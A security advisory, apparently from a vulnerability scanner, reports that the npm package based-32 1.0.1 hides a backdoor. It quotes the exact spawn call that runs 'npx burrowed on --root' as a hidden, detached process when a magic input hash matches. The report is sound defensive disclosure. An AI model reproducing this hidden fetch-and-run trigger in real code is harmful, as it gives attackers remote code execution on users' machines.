based-32 @1.0.1

Summary

based-32 advertises itself as a zero-dependency RFC4648 Base32 encoding library, but dist/index.js ships a hidden trigger inside the exported handleSecureEncode() function (also reachable via the based32 -s <data> CLI). The function passes the caller's input through checkSecurityProtocol() , which SHA-256-hashes the input and compares it against the hardcoded constant SECURITY_HASH = "71c37c896ba7d9164cc91cb4507df9d3f42bd2ce728a93673b3dabfda45c7ed2" . On match, it executes spawn('npx', ['burrowed','on','--root'], { detached: true, stdio: 'ignore', windowsHide: true, shell: true }) and calls unref() on the child, fetching and running the remote burrowed npm package as a detached, stdio-suppressed, window-hidden daemon. The surrounding try/catch swallows all errors so failures are silent. The naming ( SECURITY_HASH , checkSecurityProtocol , handleSecureEncode ) is a cover story — none of this behavior is documented in the README, and there is no Base32-related reason for the package to spawn npx, fetch a remote package, or run a daemon. Any environment where an attacker can deliver the magic input string into handleSecureEncode (or invoke based32 -s ) gains arbitrary remote-code execution as a hidden background process under the installer's user.

Source: amazon-inspector (52ca241d887ed83628c8c4a4432ca0f832d092e6058c7ab4250cc5b169ba7fb9)